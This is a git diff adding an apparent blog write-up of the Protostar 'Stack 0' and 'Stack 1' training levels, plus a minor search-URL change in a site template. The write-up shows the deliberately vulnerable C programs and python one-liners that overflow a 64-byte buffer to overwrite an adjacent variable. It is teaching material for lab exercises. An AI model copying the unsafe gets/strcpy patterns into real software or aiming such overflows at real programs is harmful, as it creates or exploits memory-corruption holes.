-
+
Stack 0
+
+
Here’s what we’re given:
+
+
#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ modified = 0;
+ gets(buffer);
+
+ if(modified != 0) {
+ printf("you have changed the 'modified' variable\n");
+ } else {
+ printf("Try again?\n");
+ }
+}
+
+
+
+
The first thing I took note of is the size of the buffer
: 64 bytes. After that, the program inputs text for buffer
, and then checks to see if you modified the modified
variable.
+I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:
+
+
$ echo `python -c 'print "A"*64'` | ./stack0
+Try again?
+
+
+
+
That works as expected, now with 65 bytes:
+
+
$ echo `python -c 'print "A"*65'` | ./stack0
+you have changed the 'modified' variable
+
+
+
+
Solved!
+
+
Stack 1
+
+
Here’s the code we’re given:
+
+
#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ if(argc == 1) {
+ errx(1, "please specify an argument\n");
+ }
+
+ modified = 0;
+ strcpy(buffer, argv[1]);
+
+ if(modified == 0x61626364) {
+ printf("you have correctly got the variable to the right value\n");
+ } else {
+ printf("Try again, you got 0x%08x\n", modified);
+ }
+}
+
+
+
+
Just like Stack 0, we’re given a buffer
array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal 0x61626364
instead of just changing it like before.
+
+
Keep in mind this is little endian, so I’ll input the value in reverse order:
+
+
$ ./stack1 `python -c 'print "A"*64'`
+Try again, you got 0x00000000
+
+
+
+
That works as expected, now with the additional bytes:
+
+
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
+you have correctly got the variable to the right value
+
+
+
+
Woo!
diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html
index 377f449..b9821e4 100644
--- a/_site/writeup/test_post.html
+++ b/_site/writeup/test_post.html
@@ -5,6 +5,11 @@
+
@@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
- url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
+ url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})